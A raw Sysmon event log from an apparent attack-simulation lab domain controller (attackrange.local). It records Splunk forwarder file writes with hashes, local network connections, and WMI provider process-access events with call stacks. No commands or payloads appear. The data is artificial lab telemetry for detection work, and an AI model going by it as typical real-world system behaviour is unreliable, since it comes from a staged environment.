Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD735ECCDAB2FD8B58C0B813FC77A4AA,SHA256=767D807343B4EF8DB110654E6734C84B0112EFB1C0F7C9918F18C3B0DAF3E7BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:25.887{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF4D9B27C77B47CC9480EED50CBC0E65,SHA256=8A7CFE65C976CA94D6231BA30A9D957962E4C7A146EEE8EA4973A4F014B9DF89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:26.934{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=548DB0D49B7BD0CE157C52131F38A5CC,SHA256=3271CF8042338266F52BD22F5AF74152E52F3435DBB1B3341B897BD6A8E74900,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:15.414{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60136-false10.0.1.12-8000- 23542300x80000000000000002238078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:27.950{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77888F676FDFDB27D96AB04E05A6261E,SHA256=37CE5A4E2A06FBCDED533C4A0FE4E10DCD69CCC5D2BE679BB40E85B889B51868,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:27.106{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BA0D353D70AC47C2D9316CA79FA2677,SHA256=1B5B172093CC8A21D4B7BEEF40D4E5814A1CB247B57947E3E52E89A4ECBF1499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:29.544{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\9unhrnfd.default-release\datareporting\aborted-session-pingMD5=F7F26B77309A2D9AA3723E85AE4D7C5A,SHA256=FBA64E4406A070D2D53891D4D6DF2F070E986834B3F9FD4FF0BE6DAB076EDEA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:29.512{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C98BAC77C6CBD297D1690E95B090656,SHA256=52F27DF19CF8F2A155A70BA313274F1A76D952A1B601D8CAC1700A018F418541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:28.997{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A345173E79E60FEB8FFEEEF6DA056190,SHA256=07865482DB3CBD327DD80869755C596F10718D7557CFCC6F6B276459A3B6845E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:30.544{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13F096CFFEC835D583840495CA9C8C47,SHA256=8F0E19C79101EC51939BD28AED26D6BD1F0D35AB75D0BACF6A3531D83CA71F23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:30.028{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B0A6D9CC969650682B8694CF3D42CF6,SHA256=D0DFC862A1B14511CA2C6393899F2BD87C5465AC0B585CA5D46AD97F8E51099B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:19.648{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55094- 23542300x80000000000000002238087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:31.137{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D61DE494246F084479C082D7034ACDA0,SHA256=79F699AED9EDB8163FC1D2B408CF61B75E7E90463D6139E4DC7312C96744F48E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:31.066{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6346D717BFEE8D6947788D14BA4DB6ED,SHA256=EBAC3408FDB1B36EBCE83290D15B771C5AD7FAB71B71662511E25DA75D7322F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:20.663{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local55094- 23542300x80000000000000002238089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:32.122{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0579EA024CB5697B6002A33A61AC6E7F,SHA256=035B7DCB87E82536E82275B10F14F2678E41B3E23E6C64E72D39CEBF16D1BFBD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:21.197{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60138-false10.0.1.12-8000- 23542300x80000000000000002238091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:33.874{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BBBDFBF3B9BF964D9C9E3B593195A9DC,SHA256=41492BC3FB94DE4D5C926CCBA32602F0A6B839044FEA791F087ADFC1FB0A192D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:33.153{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00DA6D732CDAFB6BD7188860F4C2E92A,SHA256=1755D4D832BC8F11FCA3D02073CEBEB7D07E6E639279F407355BD96797B82FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:34.172{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3965524C99C3F056265597EF4553EABA,SHA256=3FF42F76A21D3FCC23F6557F7F93E0178B0C86247D044F2F25375602D9AD37E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:35.184{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F72591019642CBE1D0D1E0C25774BD1,SHA256=7D6A411837819BA354793A73132261191FA8C6F7CD162C4D5A6F79D0CA709E7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:36.374{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:36.231{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F015B23E3D14729212AB03B31433D371,SHA256=F4E280BF691A1069F52F52BD680F819BB11E8C7656C5BC5899B28D7D725D955F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:36.106{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00B82F9776B0F0C6728ED6093B09708A,SHA256=90B4498F1E5424B627F8A5437594828134E22A5C858236BE0E59D50BA3908322,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:36.106{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F69634745CA58E1796E2C1B9475983A9,SHA256=E7B7F1D378CB24F1BFB91749B0B6519665947AB7E83FDBAB566493A021AB2DD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:37.374{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00B82F9776B0F0C6728ED6093B09708A,SHA256=90B4498F1E5424B627F8A5437594828134E22A5C858236BE0E59D50BA3908322,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:26.570{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53124- 354300x80000000000000002238099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:26.211{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60139-false10.0.1.12-8000- 23542300x80000000000000002238098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:37.247{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36C3F6EB5D7BCF2246DF9FC80CE97D2D,SHA256=849B7DBC63822688184EEF60F66E2C0649425E887C91C36464A1C3EA3765B07D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:27.585{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local53124- 354300x80000000000000002238103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:27.508{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60140-false10.0.1.12-8089- 23542300x80000000000000002238102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:38.267{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7F2951AEBC7CB6C33ABCD5F3B3E4263,SHA256=CFE47FD4ACD708D3AD41E24890429C3774E0EF8AF22E20D31742F6DB65A093A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:39.294{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA5CC190408D016E08E12A96C8097566,SHA256=F28A090B715F5B5B674850F270BCC15D40D13AB56F8594F008117678754446D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:40.309{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10C8F0E45F4CE3E4192A22864B2BD752,SHA256=D6F03F8CD9BDEF9000DA6D6C4A2AA38962B66089290E9C2436DCD68759C88237,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:31.211{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60141-false10.0.1.12-8000- 23542300x80000000000000002238108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:41.325{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FC6EBC254A8F93BF31E9C502BAADD1,SHA256=85702F31333FC44A306A28B1ACE782C0CAC663EB8F38A46D0C84A3CF0B6137F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:41.091{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=158551F02EC4A6B9310B3139AA714164,SHA256=2D98336637613CC65F1410E62D9C3EFE5E082CCE44766CC2132A0C04E43880DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:42.622{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B00FBB297ED4CA97C15CBF6D23CECF6B,SHA256=705BA71086F5604193C8CD4336B57DB018D89F5E7D0F8D95D1B420045E4AC0FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:42.419{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BB0F938A86BF8BD2F0F85A199BC62EB,SHA256=7E04ABE36C3DE42FFA32EED681EA39C26BF91C560B4E059B891A7C9407975740,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:43.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4